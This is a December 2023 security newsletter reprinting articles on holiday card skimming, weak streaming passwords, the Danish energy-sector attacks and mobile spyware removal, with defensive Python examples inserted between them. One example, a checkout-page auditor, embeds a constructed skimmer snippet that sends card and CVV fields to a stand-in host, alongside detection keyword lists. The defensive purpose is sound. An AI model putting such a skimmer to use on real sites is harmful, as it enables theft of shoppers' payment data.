2023 December Cyber Bytes

Online stores may not be as secure as you think

Credit card skimming is on the rise for the holiday shopping season, according to Malwarebytes.

HelpNetSecurity.com on November 23, 2023

Online stores are not always as secure as you might think, yet you have to hand over your credit card details to buy anything. When a merchant website is hacked, any purchase made on it can be intercepted by bad actors. Often the malicious code sits just beneath the surface of the checkout page, completely invisible to shoppers.


The report details a specific credit card skimming operation, the Kritec campaign, which specializes in crafting very realistic payment templates with convincing language localization and has compromised hundreds of websites.

Malwarebytes threat researchers tracked a 50% increase month-over-month in the US since September in newly registered domains attributed to Kritec, demonstrating a huge uptick in both compromised sites and opportunity for innocent shoppers to fall victim.

“Embrace the magic of the holidays (and the season’s cyber deals), but don’t forget to safeguard your digital gifts,” warns Jérôme Segura, senior director of threat research, Malwarebytes. “Whether shopping online or booking your experience with Santa, be aware that cybercriminals have laid the groundwork to take advantage of the holiday shopping season via both obvious and very subtle avenues.”

Another risk to shoppers this holiday season is malvertising – online ads that deliver scams or install malware. This type of fraud is on the rise in both volume of malicious ads and the sophistication behind them. Over the past two months, Malwarebytes has tracked a 42% increase month-over-month in malvertising incidents in the US, pointing to an alarming trend.

Recent research reveals malicious campaigns carried out in online ads via Google searches, some impersonating big-name brands and scams targeting online tech support for Windows users.

For many online scams, it is near impossible for an individual, even a highly skilled one, to know when they’re using a website that includes a third-party component compromised by criminal hackers or operated by a company prepared to bend the rules at the expense of the user’s privacy and security.
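Shoppers cannot see a compromised third-party component, but the merchant can audit for one. The following is an added example, not code from Malwarebytes or from the article: it parses the script tags on a checkout page and flags third-party origins that are not on a vetted allowlist, allowed third-party scripts loaded without a Subresource Integrity (SRI) hash, and inline code that both reads card fields and talks to the network, which is the shape of a skimmer. The HTML sample, the merchant origin `shop.example` and the allowlisted provider `js.psp.example` are all constructed for the example.

```python
"""Audit the <script> tags on a checkout page for the kind of third-party or
injected code a card skimmer rides in on. Added example, not code from
Malwarebytes or the article. Runs offline against a constructed HTML sample;
FIRST_PARTY and ALLOWED_THIRD_PARTY are hypothetical."""
from html.parser import HTMLParser
from urllib.parse import urlparse

FIRST_PARTY = "shop.example"                  # hypothetical merchant origin
ALLOWED_THIRD_PARTY = {"js.psp.example"}      # hypothetical vetted payment provider

UNVETTED = "unvetted third-party origin"
NO_SRI = "third-party script without an SRI integrity attribute"
INLINE_EXFIL = "inline script reads card fields and sends them over the network"

# Constructed checkout page: one first-party script, one vetted provider script
# with SRI, one vetted script without SRI, one unknown CDN, and one inline
# snippet shaped like a Magecart-style skimmer.
SAMPLE_PAGE = """<html><head>
<script src="/static/checkout.js"></script>
<script src="https://js.psp.example/v3/" integrity="sha384-EXAMPLEHASH" crossorigin="anonymous"></script>
<script src="https://js.psp.example/v3/extra.js"></script>
<script src="https://cdn.example-analytics.net/tag.js"></script>
<script>
document.querySelector('form').addEventListener('submit', function () {
  fetch('https://collect.example-cdn.org/c', {method: 'POST',
        body: JSON.stringify({card: cardField.value, cvv: cvvField.value})});
});
</script>
</head><body></body></html>"""


class ScriptCollector(HTMLParser):
    """Collect every <script>: its src, whether it carries SRI, and its inline body."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            a = dict(attrs)
            self._current = {"src": a.get("src"), "integrity": "integrity" in a, "body": ""}
            self.scripts.append(self._current)

    def handle_data(self, data):
        if self._current is not None:
            self._current["body"] += data

    def handle_endtag(self, tag):
        if tag == "script":
            self._current = None


NETWORK_CALLS = ("fetch(", "xmlhttprequest", "sendbeacon", "new image(")
CARD_FIELDS = ("card", "cvv", "cvc", "expir")


def audit(html, first_party=FIRST_PARTY, allowed=ALLOWED_THIRD_PARTY):
    """Return (source, reason) findings for scripts that deserve a closer look."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for s in collector.scripts:
        if s["src"] is None:
            body = s["body"].lower()
            # Heuristic: code that touches payment fields and makes a network call.
            if any(c in body for c in NETWORK_CALLS) and any(f in body for f in CARD_FIELDS):
                findings.append(("inline", INLINE_EXFIL))
            continue
        host = (urlparse(s["src"]).hostname or "").lower()
        if host == "" or host == first_party or host.endswith("." + first_party):
            continue                              # relative URL or first-party host
        if host not in allowed:
            findings.append((s["src"], UNVETTED))
        elif not s["integrity"]:
            findings.append((s["src"], NO_SRI))
    return findings


if __name__ == "__main__":
    for src, reason in audit(SAMPLE_PAGE):
        print(f"{reason}: {src}")
```

A static audit like this only catches what is in the served HTML; a skimmer loaded at runtime through a tag manager or a modified first-party file will not appear. The runtime control is a Content-Security-Policy whose `script-src` lists exactly the approved origins, paired with SRI on every static third-party script.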

Tips for safer online shopping
Avoid clicking on sponsored ads: Conduct a direct search for your retailer of choice to avoid falling prey to prevalent malvertising tactics which have been known to spoof even huge, reputable brands such as Amazon.

Check that copyright: Avoid inputting any payment information into websites that don’t look like they’ve been maintained for a while. Red flags include outdated visuals and old copyright stamps.

Consider a password manager and MFA: With every site requiring a password these days, use a password manager to give each retailer account (which is where your saved payment details live) a unique, strong password, and set up multi-factor authentication where available.

Keep an eye on your financial statements: An uptick in online shopping deserves an uptick in your vigilance for checking online bank and credit card statements. Flag anything that seems suspicious for quick resolution.

Run an antivirus solution: Most antivirus products offer some kind of web protection that detects malicious domains and IP addresses.

Stop using weak passwords for streaming services - it's riskier than you think

Using a simple password for Netflix, Hulu, Disney+, or another service can expose your personal data to hackers.

ZDNet.com by Lance Whitney on November 16, 2023

Have you ever tried to create or type a password for a streaming service directly on your TV screen? If so, you know how clumsy it is. Using a remote control to hunt and peck each character is such a maddening process that you may be tempted to use a short and simple password. But that's not a good idea.

Cybercriminals look for weak and insecure passwords not just across PCs, mobile devices, and websites but on streaming services. That includes the passwords you create on your TV or streaming box and those you may share with family, friends, and other people who use the same service.

To illustrate the temptation toward creating short, simple, and weak passwords, password manager NordPass looked at the 200 most common passwords used by people around the world. For the fifth edition of this annual report, NordPass found that individuals still turn to the weakest possible passwords despite the risks of malware, theft, and account compromise.

The top 10 passwords overall were:

123456
admin
12345678
123456789
1234
12345
password
123
Aa123456
1234567890

The password '123456' has held the top spot four times out of the past five years, a sign that people continue to rely on this simple stream of characters. Most of the other passwords are variations on the same theme. Regardless of which password people use, all of these top ten could be cracked by a hacker in less than a second.

The results were actually worse for passwords used for streaming services. The 10 most common passwords for streaming platforms were:

123456
12345
123456789
12345678
netflix
UNKNOWN
123123
1234567890
netflix123
qwerty
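
The claim that every entry in these lists falls in under a second follows from how crackers work: a dictionary of known passwords is tried first, then simple mangling rules, and only then brute force. The following is an added example, not NordPass's methodology, that scores a candidate password in that order. The dictionary is the two top-10 lists above, embedded as a constructed sample, and the guess rate of 1e10 per second is an assumption standing in for an offline attack on a fast unsalted hash.

```python
"""Estimate how fast a password falls, the way a cracker would: dictionary
first, then a simple mangling rule, then brute force. Added example, not
NordPass's methodology; the guess rate is an assumption."""
import math
import string

# Constructed sample: the two top-10 lists quoted in the article.
COMMON_PASSWORDS = {
    "123456", "admin", "12345678", "123456789", "1234", "12345", "password",
    "123", "Aa123456", "1234567890", "netflix", "UNKNOWN", "123123",
    "netflix123", "qwerty",
}
COMMON_LOWER = {p.lower() for p in COMMON_PASSWORDS}

# Assumption: offline attacker against a fast unsalted hash, 1e10 guesses/s.
GUESSES_PER_SECOND = 1e10


def charset_size(pw):
    """Size of the smallest standard alphabet that covers every character."""
    size = 0
    if any(c in string.ascii_lowercase for c in pw):
        size += 26
    if any(c in string.ascii_uppercase for c in pw):
        size += 26
    if any(c in string.digits for c in pw):
        size += 10
    if any(c in string.punctuation or c == " " for c in pw):
        size += len(string.punctuation) + 1
    if any(c not in string.printable for c in pw):
        size += 128  # rough allowance for non-ASCII characters
    return size


def assess(pw, rate=GUESSES_PER_SECOND):
    """Return (attack, search_space_bits, expected_seconds_to_crack)."""
    if pw.lower() in COMMON_LOWER:
        return ("dictionary", 0.0, 0.0)            # found in the first few guesses
    base = pw.rstrip(string.digits)
    if base and base.lower() in COMMON_LOWER:      # "password99", "Admin2023"
        space = 10 ** (len(pw) - len(base))        # only the digit suffix is unknown
        return ("dictionary+digits", math.log2(space), space / 2 / rate)
    space = max(1, charset_size(pw)) ** len(pw)    # brute force over the full alphabet
    return ("bruteforce", math.log2(space), space / 2 / rate)


def is_acceptable(pw, min_bits=60):
    """Policy check: only passwords that force a >= 2^min_bits search pass."""
    attack, bits, _ = assess(pw)
    return attack == "bruteforce" and bits >= min_bits


def human(seconds):
    for unit, size in (("years", 31_557_600), ("days", 86_400), ("hours", 3_600), ("minutes", 60)):
        if seconds >= size:
            return f"{seconds / size:.1f} {unit}"
    return f"{seconds:.3f} seconds"


if __name__ == "__main__":
    for pw in ("123456", "Netflix123", "password99", "disney456", "Tr0ub4dor&3xample-Key"):
        attack, bits, secs = assess(pw)
        print(f"{pw:24} {attack:18} {bits:6.1f} bits  {human(secs)}")
```

The brute-force figure is the attacker's worst case: a password built from a word plus a date pattern is weaker than its alphabet size suggests, because real crackers apply wordlists and rules long before exhaustive search. That is why the long random strings a password manager generates score well here and "netflix123" does not.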

"We've noticed that streaming passwords are, on average, weaker," NordPass chief technology officer Tomas Smalakys told ZDNET. "I could only assume that it's because people tend to share them, therefore create easier ones to remember, as well as the reason that they have to type it on a TV."

Using weak passwords for streaming services is problematic because such accounts are easy prey for malware capable of stealing personal information, Smalakys said. Malware can capture much of the data saved in a person's browser: usernames, passwords, and email addresses, along with browser cookies, autofill data, and credit cards saved in the browser.

To compile the list of passwords, NordPass worked with independent cybersecurity researchers. Together, they analyzed a 4.3TB database taken from public sources, including those on the dark web. They also evaluated a 6.6TB database comprised of passwords stolen by different malware strains, such as Redline, Vidar, Taurus, Raccoon, Azorult, and Cryptbot. The malware logs contained not just passwords but the source websites so that hackers knew which users and which sites to target.

So how can people create more secure passwords and protect their streaming accounts and other services from compromise? Smalakys offers a few pieces of advice.

"I'd recommend setting up 2FA (two-factor authentication), if your streaming service allows this option," Smalakys said. "Also, try out alternative authentication methods. The majority of streaming services allow logging in by users scanning a QR code with their phone. If not, I'd still recommend setting up long and random passwords -- a couple of minutes of a person's time is definitely worth spending to stay secure."

Passkeys are slowly catching on as a more secure and simpler alternative to passwords. Companies such as Amazon, Apple, Google, Microsoft, and Yahoo now support passkeys. However, until more websites allow for this passwordless type of authentication, your best bet is to use a password manager. But the method you use to manage your passwords makes a big difference.

Smalakys advises against saving passwords in a browser and instead recommends that people use a dedicated password manager. Both types can store passwords and encrypt them end to end, he said. But the difference lies in how the password vault is protected. To safeguard your credentials, browser password managers and dedicated password managers both create private keys stored on the client side and public keys stored on a server. But password managers go a step further.

"What's really important is that password managers also encrypt a private key upon creation of a master password (most browser password managers do not have a master password)." Smalakys explained. "Therefore, if a hacker installs malware on your device, they can acquire the private key and access vault contents stored in the browser password manager. With password managers, even if a hacker acquires a private key to the user's vault, it will be encrypted and thus not usable."

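What "encrypt the private key upon creation of a master password" means in practice is that the key protecting the vault is itself stored only in wrapped form, under a key stretched from the master password, so a copied vault file is useless without that password. The following is an added example, not the implementation of NordPass or of any browser. PBKDF2-HMAC-SHA256 stands in for the vendor's key derivation function, the HMAC-SHA256 counter-mode keystream with an encrypt-then-MAC tag stands in for the authenticated cipher (AES-GCM or XChaCha20-Poly1305) a real vault would use, and the iteration count is an assumption for the demo.

```python
"""Vault key at rest: stored as-is versus wrapped under a master password.
Added example, not NordPass's or any browser's real implementation; the
cipher here is a stand-in for a real AEAD, and the iteration count is an
assumption for the demo."""
import hashlib
import hmac
import os

PBKDF2_ITERATIONS = 200_000


def _keystream(key, nonce, length):
    """HMAC-SHA256 in counter mode: a simple PRF-based stream cipher."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return out[:length]


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def derive_keys(master_password, salt):
    """Stretch the master password into separate encryption and MAC keys."""
    okm = hashlib.pbkdf2_hmac("sha256", master_password.encode("utf-8"), salt,
                              PBKDF2_ITERATIONS, dklen=64)
    return okm[:32], okm[32:]


def wrap_vault_key(vault_key, master_password):
    """Return salt || nonce || ciphertext || tag; this is what lands on disk."""
    salt, nonce = os.urandom(16), os.urandom(16)
    enc_key, mac_key = derive_keys(master_password, salt)
    ct = _xor(vault_key, _keystream(enc_key, nonce, len(vault_key)))
    tag = hmac.new(mac_key, salt + nonce + ct, hashlib.sha256).digest()
    return salt + nonce + ct + tag


def unwrap_vault_key(blob, master_password):
    """Recover the vault key; raises on a wrong password or a tampered blob."""
    salt, nonce, ct, tag = blob[:16], blob[16:32], blob[32:-32], blob[-32:]
    enc_key, mac_key = derive_keys(master_password, salt)
    expected = hmac.new(mac_key, salt + nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):
        raise ValueError("wrong master password or tampered vault")
    return _xor(ct, _keystream(enc_key, nonce, len(ct)))


def key_readable_from_disk(on_disk, vault_key):
    """Model the infostealer: it copies the file and looks for a usable key."""
    return vault_key in on_disk


def demo():
    """(browser-style readable?, manager-style readable?) for the same vault key."""
    vault_key = os.urandom(32)
    browser_style = vault_key            # no master password: key stored without a wrap
    manager_style = wrap_vault_key(vault_key, "correct horse battery staple")
    return (key_readable_from_disk(browser_style, vault_key),
            key_readable_from_disk(manager_style, vault_key))


if __name__ == "__main__":
    print("key recoverable from disk (browser-style, manager-style):", demo())
```

One caveat on the browser side: browser vaults are normally protected by the operating system's user keystore (DPAPI on Windows, the Keychain on macOS), not stored raw. That protection is unlocked for whatever runs as the logged-in user, which is exactly the position infostealer malware is in, so for the threat the article describes it amounts to the same thing as no wrap at all.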
Danish energy sector hit by a wave of coordinated cyberattacks

The Danish energy sector has suffered what is believed to be the most extensive cyberattack in Danish history, according to SektorCERT.

HelpNetSecurity.com by Helga Labus on November 14, 2023

SektorCERT, an organization owned and funded by Danish critical infrastructure (CI) companies, uses a network of 270 sensors implemented across the country and these organizations to monitor internet traffic and detect possible cyberattacks.

From this vantage point, in May 2023, they detected three waves of attacks targeting companies in the energy sector.

The first one started on May 11, when the attackers simultaneously exploited a command injection vulnerability (CVE-2023-28771) in Zyxel firewalls deployed at 16 companies. The attackers gained control of the devices at 11 companies and had access to the critical infrastructure behind it, SektorCERT says. They used the access to grab data about the configuration and active accounts.

Even though CVE-2023-28771 was patched by Zyxel in April 2023, for various reasons the attacked companies had not installed the update. The interesting thing, though, is that the attackers knew exactly which companies to hit.

“At this time, information about who had vulnerable devices was not available on public services such as Shodan. Therefore, the attackers had to have obtained information about who had vulnerable firewalls in some other way,” the organization noted, adding that its sensors did not register any scans that the attackers might have performed prior to the attacks.

“The other remarkable thing was that so many companies were attacked at the same time. This kind of coordination requires planning and resources.”

SektorCERT’s incident response team managed to stop the attackers before they could start further exploiting the achieved access.

On May 22, a second wave of attacks started. SektorCERT was alerted by a sensor that a firewall at one of its member organizations was downloading new software over an unencrypted connection, a sign that the device had already been compromised. The attackers used it to enrol the infrastructure in the Mirai botnet and carry out DDoS attacks against targets in Hong Kong and the US, before the compromised organization disconnected from the internet and went into “island mode” (i.e., isolated from the national electricity distribution network).

SektorCERT researchers believe that, during the second wave, the attackers also exploited two new vulnerabilities (CVE-2023-33009 and CVE-2023-33010) that Zyxel disclosed and patched a few days later (May 24).

Possible Sandworm involvement
A series of additional attacks went on until May 24, when SektorCERT was alerted to network traffic to one of the compromised organizations coming from an IP address previously used by the Sandworm APT, a group that has been known to target the Ukrainian energy grid for many years.

“Whether Sandworm was involved in the attack cannot be said with certainty. Individual indicators of this have been observed, but we have no opportunity to either confirm or deny it,” SektorCERT said.

It is likely that some of the attacks were simply opportunistic, while others might have had a more sinister goal. But none of them affected the operation of the Danish power grid.

SektorCERT has provided indicators of compromise (IoCs) and offered 25 recommendations for technical and organizational measures that organizations should implement to keep their networks safe.
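Two of the detections in this account are easy to reproduce against sensor logs: a connection to or from an address on an indicator list, and the member's own firewall fetching new software over plain HTTP. The following is an added example, not SektorCERT's sensor code and not the IoCs from its report: the log format is invented for the example, the log lines are constructed, and the indicator addresses come from the reserved documentation ranges rather than any real list.

```python
"""Sweep network-sensor logs for the two behaviours described above:
traffic to or from an address on an indicator list, and a firewall pulling
new software over an unencrypted connection. Added example with constructed
log lines and documentation-range addresses; not SektorCERT's sensor code,
not the IoCs from its report, and the log format is invented."""
import ipaddress
import re

# Constructed indicator list (203.0.113.0/24 and 198.51.100.0/24 are reserved
# documentation ranges, used here as stand-ins for real IoCs).
IOC_IPS = {ipaddress.ip_address("203.0.113.45"), ipaddress.ip_address("198.51.100.7")}
# Our own firewall's address (assumption for the example).
FIREWALL_IPS = {ipaddress.ip_address("192.0.2.1")}
FIRMWARE_SUFFIXES = (".bin", ".img", ".fw")

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<sensor>\S+) proto=(?P<proto>\w+) "
    r"src=(?P<src>[\d.]+):(?P<sport>\d+) dst=(?P<dst>[\d.]+):(?P<dport>\d+)"
    r"(?: uri=(?P<uri>\S+))?$"
)

# Constructed sample log, one line per flow seen by the sensor.
SAMPLE_LOGS = """\
2023-05-11T09:02:11Z sensor-07 proto=tcp src=203.0.113.45:51234 dst=192.0.2.1:443
2023-05-11T09:02:12Z sensor-07 proto=tcp src=198.51.100.200:40000 dst=192.0.2.1:443
2023-05-22T14:30:05Z sensor-07 proto=tcp src=192.0.2.1:38812 dst=198.51.100.9:80 uri=http://198.51.100.9/fw/update.bin
2023-05-22T14:31:40Z sensor-07 proto=tcp src=192.0.2.1:38900 dst=198.51.100.7:443
2023-05-24T03:15:00Z sensor-07 proto=udp src=198.51.100.7:53 dst=192.0.2.1:53
garbage line that does not parse
""".splitlines()


def analyse(lines, iocs=IOC_IPS, firewalls=FIREWALL_IPS):
    """Return a list of (alert_type, timestamp, detail) tuples."""
    alerts = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue                                  # skip lines that do not parse
        src, dst = ipaddress.ip_address(m["src"]), ipaddress.ip_address(m["dst"])
        if src in iocs or dst in iocs:
            alerts.append(("ioc-match", m["ts"], f"{src} -> {dst}"))
        # The firewall itself initiating a plaintext HTTP download of a firmware-looking file.
        uri = m["uri"] or ""
        if (src in firewalls and m["dport"] == "80"
                and uri.startswith("http://") and uri.lower().endswith(FIRMWARE_SUFFIXES)):
            alerts.append(("insecure-firmware-fetch", m["ts"], uri))
    return alerts


def summarize(alerts):
    """Count alerts by type."""
    counts = {}
    for kind, _, _ in alerts:
        counts[kind] = counts.get(kind, 0) + 1
    return counts


if __name__ == "__main__":
    found = analyse(SAMPLE_LOGS)
    for kind, ts, detail in found:
        print(f"{ts} {kind}: {detail}")
    print(summarize(found))
```

The indicator match is only as good as the list, and the report's own caution applies: an address once used by Sandworm is a lead, not an attribution. The firmware-fetch rule is the more durable of the two, because a perimeter device that updates itself over cleartext is wrong regardless of who is on the other end.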

Removing spyware from your phone can be tricky. These options are your best bet

iPhone and Android users alike are facing more sophisticated surveillance threats than ever before. Suspect you're being tracked? Here's what to do right now.

ZDNet.com by Charlie Osborne on October 20, 2023

There are multiple ways to prevent a government agency, country, or cybercriminal from peeking into our digital lives, for example, by using virtual private networks (VPNs), end-to-end encryption, and browsers that do not track user activity.

But, it can be extremely difficult to detect or remove spyware once it's implanted in a device.

This guide will run through different forms of malicious software that could end up on your iOS or Android handset, what the warning signs of infection are, and how to remove such pestilence from your mobile devices -- whenever it is possible to do so.

We will also touch upon stalkerware and other ways threats closer to home may spy on you -- and what you can do about it.

What is spyware?
Spyware comes in many forms, and before you can tackle the problem, it's useful to know the basic differences.

Nuisanceware is often bundled with legitimate apps. It interrupts your web browsing with pop-ups, changes your homepage or search engine settings, and may also gather your browsing data in order to sell it off to advertising agencies and networks.

Although considered malvertising, nuisanceware is generally not dangerous or a threat to your core security. Instead, these malware packages are focused on illicit revenue generation by infecting machines and creating forced ad views or clicks.

There's also basic spyware. These generic forms of malware steal operating system and clipboard data and anything of potential value, such as cryptocurrency wallet data or account credentials. Spyware isn't always targeted and may be used in general phishing attacks.

Spyware may land on your device through phishing, malicious email attachments, social media links, or fraudulent SMS messages.

Advanced spyware, also known as stalkerware, is a step up from basic spyware. Unethical and sometimes dangerous, this malware is sometimes found on desktop systems, but it is now most commonly implanted on phones. Spyware and stalkerware may be used to monitor emails and SMS and MMS messages sent and received; to intercept live calls for the purpose of eavesdropping across standard telephone lines or Voice over IP (VoIP) applications; to covertly record environmental noise or take photos; to track victims via GPS; or to hijack social media apps such as Facebook and WhatsApp. Stalkerware may also include keylogging features.

Stalkerware is typically used to spy on someone as an individual and watch what they do, say, and where they go. Stalkerware is commonly linked to cases of domestic abuse.

Finally, there's government-grade commercial spyware. Pegasus is the most well-known recent case, sold to governments as a tool for combating terrorism and for law enforcement purposes. Pegasus ultimately was found on smartphones belonging to journalists, activists, political dissidents, and lawyers.

In November 2022, the Google Threat Analysis Group (TAG) published details on Heliconia, a new commercial spyware framework with a potential link to a private Spanish company.


What are the warning signs of a spyware infection attempt?
There are several signs to watch for that might indicate you are being targeted by a spyware or stalkerware operator.

Finding yourself the recipient of odd or unusual social media messages or emails might be part of a spyware infection attempt. You should delete these without clicking on any links or downloading any files.

The same is true for SMS messages, which may contain links to trick you into unwittingly downloading malware.

To catch a victim unaware, these phishing messages lure you into clicking a link or executing software that carries a spyware or stalkerware payload. Delivery by this route depends on the user acting, so the messages try to panic you: demanding payment to a tax office or bank, for example, or posing as a failed delivery notice. They may also arrive from a spoofed address belonging to a contact you trust.

When it comes to stalkerware, initial infection messages may be more personal and tailored to the victim.

For stalkerware in particular, the attacker usually needs either physical access to the device or to trick the victim into installing the app themselves. It can take less than a minute to install some variants of spyware and stalkerware.

If your phone goes missing or has been out of your possession for a time, and reappears with different settings or changes that you do not recognize, this may be an indicator of tampering.


What are the typical signs that spyware is on my phone?
You may experience unexpected handset battery drain, overheating, and strange behavior from the device's operating system or apps. Settings such as GPS and location functions may turn on unexpectedly or you may see random reboots. If you are suddenly using far more data than normal, this could be an indication that information is being sent from your smartphone or that remote connections are active. You may also have trouble turning off your device completely.

Certain forms of spyware focused on fraudulent revenue generation may be able to secure enough permissions to impact your bank balance. If you are signed up for services or premium SMS plans and you know you didn't consent to them, this could be a sign that spyware is on your device. Keep an eye on your credit cards for any signs of suspicious payments.

An important point to mention is that sometimes spyware or other forms of malicious software might end up on your device via an originally benign app. There have been cases of developers releasing a genuine, useful app in official repositories, such as a currency converter or weather app, and then -- after a large user base has been gathered -- the developers twist the app's functions.

Last year, Google removed malicious apps from the Google Play Store that had been masquerading as Bluetooth utilities and had been downloaded by over a million users. While the apps didn't appear malicious at first, within days, users were bombarded with ads and pop-ups.


What other signs might I see on Android and iOS devices?
Surveillance software is becoming more sophisticated and can be difficult to detect. However, not all forms of spyware and stalkerware are invisible, and it is possible to find out if you are being monitored.

Android
One telltale sign on an Android device is a setting that allows apps to be downloaded and installed outside of the official Google Play Store.

If this setting is enabled and you did not turn it on, it may indicate tampering. Not every form of spyware and stalkerware requires a rooted device (the Android equivalent of a jailbroken iPhone), though; sideloading an app needs only this setting, not root.

This setting is found in most modern Android builds in Settings > Security > Allow unknown sources. (This varies depending on the device and vendor.) You can also check Apps > Menu > Special Access > Install unknown apps to see if anything appears that you do not recognize, but there is no guarantee that spyware will show up on the app list.

Some forms of spyware will also use generic names and icons to avoid detection. For example, they may appear to be a useful utility app such as a calendar, calculator, or currency converter. If a process or app comes up on the app list that you are not familiar with, a quick search online may help you find out whether it is legitimate.
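The same two checks can be made from a computer over adb, which is how an investigator would do it rather than scrolling through Settings. The following is an added example, not from the article or from Google: it triages the third-party package list for apps that did not come from the Play Store (including those with no recorded installer, the signature of a sideload) and names that imitate system components, and reads the legacy unknown-sources toggle. The command outputs below are constructed to resemble `adb shell pm list packages -3 -i` and `adb shell settings get secure install_non_market_apps`; the package names and the installer allowlist are hypothetical.

```python
"""Triage two things an Android investigator pulls over adb for the signs
described above: which third-party apps came from outside the Play Store,
and whether installs from unknown sources are enabled. Added example; the
outputs are constructed to resemble `adb shell pm list packages -3 -i` and
`adb shell settings get secure install_non_market_apps`, and the installer
allowlist and package names are hypothetical."""
import re

# Constructed output: the -3 flag lists third-party packages, -i their installer.
PM_OUTPUT = """\
package:com.bank.example.app  installer=com.android.vending
package:com.weather.example  installer=com.android.vending
package:com.sysupdate.service  installer=null
package:com.calculator.helper  installer=com.android.packageinstaller
"""
SETTING_OUTPUT = "1\n"   # 1 = unknown sources allowed (global toggle on Android 7 and earlier)

TRUSTED_INSTALLERS = {"com.android.vending"}   # assumption: Play Store only
# Third-party packages whose names imitate system components deserve a second look.
SUSPICIOUS_NAME_RE = re.compile(r"(sys|update|service|helper|sync)", re.IGNORECASE)


def parse_pm(output):
    """Map package name -> installer package (None when no installer is recorded)."""
    pkgs = {}
    for line in output.splitlines():
        m = re.match(r"package:(\S+)\s+installer=(\S+)", line)
        if m:
            pkgs[m.group(1)] = None if m.group(2) == "null" else m.group(2)
    return pkgs


def triage(pm_output, setting_output, trusted=TRUSTED_INSTALLERS):
    """Return (subject, reason) findings, the unknown-sources setting first."""
    findings = []
    if setting_output.strip() == "1":
        findings.append(("install_non_market_apps", "installs from unknown sources are enabled"))
    for pkg, installer in parse_pm(pm_output).items():
        if installer in trusted:
            continue
        reason = ("sideloaded, no installer recorded" if installer is None
                  else f"installed by {installer}")
        if SUSPICIOUS_NAME_RE.search(pkg):
            reason += "; name imitates a system component"
        findings.append((pkg, reason))
    return findings


if __name__ == "__main__":
    for subject, reason in triage(PM_OUTPUT, SETTING_OUTPUT):
        print(f"{subject}: {reason}")
```

On Android 8 and later the global toggle no longer exists; the permission is granted per app (the Install unknown apps screen mentioned above), so the companion check there is which apps hold the REQUEST_INSTALL_PACKAGES app-op. An installer of `com.android.packageinstaller` or none at all does not prove malice, since a user can legitimately sideload, but it is the list to start from.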

iOS 
iOS devices that aren't jailbroken are generally harder to install malware on than Android handsets, unless an exploit for a zero-day or unpatched vulnerability is used against you. However, the same principles apply: with the right tool, exploit, or software, your device could be compromised either with physical access or remotely. You are more exposed if you have not updated iOS to the latest version, since each update closes vulnerabilities that such exploits rely on.

Both iOS and Android phones, however, will typically show symptoms of a malware infection.


How can I remove spyware from my device?
By design, spyware and stalkerware are hard to detect and can be just as hard to remove. It is not impossible in most cases, but it may take some drastic steps on your part. Sometimes the last-resort option may be to abandon your device.

When spyware is removed, especially in the case of stalkerware, some attackers will receive an alert warning them that the victim's device has been cleaned up. Should the flow of your information suddenly stop, this would be another clear sign to the attacker that the malicious software has been removed.

Do not tamper with your device if you feel your physical safety may be in danger. Instead, reach out to the police and supporting agencies.

Now, here are some removal options:

Run a malware scan: There are mobile antivirus solutions available that can detect and remove spyware. This is the easiest solution available, but it may not be effective in every case. Cybersecurity vendors, including Malwarebytes, Avast, and Bitdefender, all offer mobile spyware-scanning tools. 


Update your operating system: It may seem obvious, but when an operating system releases a new version, which often comes with security patches and upgrades, this can -- if you're lucky -- cause conflict and problems with spyware. Keep this updated.


If all else fails, factory reset... or junk it: Performing a factory reset and clean install on the device you believe is compromised may help eradicate some forms of spyware and stalkerware. However, make sure to back up important content first. On Android platforms, the reset option is usually found under Settings > General Management > Reset > Factory Data Reset (this varies by vendor). On iOS, go to Settings > General > Transfer or Reset iPhone. Both Google and Apple publish step-by-step reset instructions on their support websites.

Unfortunately, some stalkerware services may survive factory resets. So, failing all of that, consider restoring to factory levels and then throwing your device away.

If you have found suspicious software on your handset, consider the following:

Change your passwords: If you suspect account compromise, change the passwords of every important account you have. Many of us have one or two central "hub" accounts, such as an email address linked to all of our other services. Remove access to any such hub services you use from a compromised device.


Create a new email address: Known only to you, a new address that you then tether to your main accounts should, if it is safe to do so, be an option you consider if stalkerware is involved. This can help you wrestle back control of your accounts covertly and quietly, without alerting anyone.

What can I do about advanced spyware like Pegasus?
Government-grade spyware can be more difficult to detect. However, as noted in a guide on Pegasus published by Kaspersky, there are some actions you can take to mitigate the risk of being subject to such surveillance, based on current research and findings:

Reboots: Reboot your device daily to prevent persistence from taking hold. The majority of infections have appeared to be based on zero-day exploits with little persistence; therefore, rebooting can hamper attackers.


Disable iMessage and FaceTime (iOS): As features enabled by default, iMessage and FaceTime are attractive avenues for exploitation. A number of new Safari and iMessage exploits have been developed in recent years. 


Use an alternative browser other than Safari or default Chrome: Some exploits do not work well on alternatives such as Firefox Focus. 


Use a trusted, paid VPN service, and install an app that warns when your device has been jailbroken. Some AV apps also will perform this check.  

It is also recommended that individuals who suspect a Pegasus infection make use of a secondary device, preferably running GrapheneOS, for secure communication.

How do I keep spyware and stalkerware off my device in the first place?
Unfortunately, no mobile device is completely protected against the scourge of spyware. However, we have provided some tips below to mitigate the risk of future infections:

Protect your device physically: Your first line of defense is to maintain adequate physical controls. Modern smartphones will allow you to set PIN codes and patterns or to use biometrics including fingerprints or retina scans to stop your handset from being physically tampered with. 


Update your operating system: When system updates are available, ensure you install them in a timely fashion. As they contain security fixes and patches, they are one of the most important defenses you have against malware.


Use antivirus software: There are mobile antivirus solutions available that can detect and remove spyware. Running frequent scans will help protect your handset.


Only download apps from official sources: The majority of spyware and malware is found outside of Google Play and Apple's App Store, so be cautious about installing apps from third-party websites. 


Watch out for malicious links: Mobile malware is often spread through phishing and malicious links, spread through platforms including social media services. These links may urge you to download apps from outside of Google Play or the App Store, and may be disguised as everything from antivirus software to streaming services.


Do not jailbreak your device: Jailbreaking not only voids your warranty but can open the door to malicious apps and software having a deep foothold in your OS, which may make removal extremely difficult, or impossible. 


Enable two-factor authentication (2FA): When account activity and logins require further consent from a mobile device, this can also help protect individual accounts. (However, spyware may intercept the codes sent during 2FA protocols.)

What are Google and Apple doing to protect Android and iOS devices?
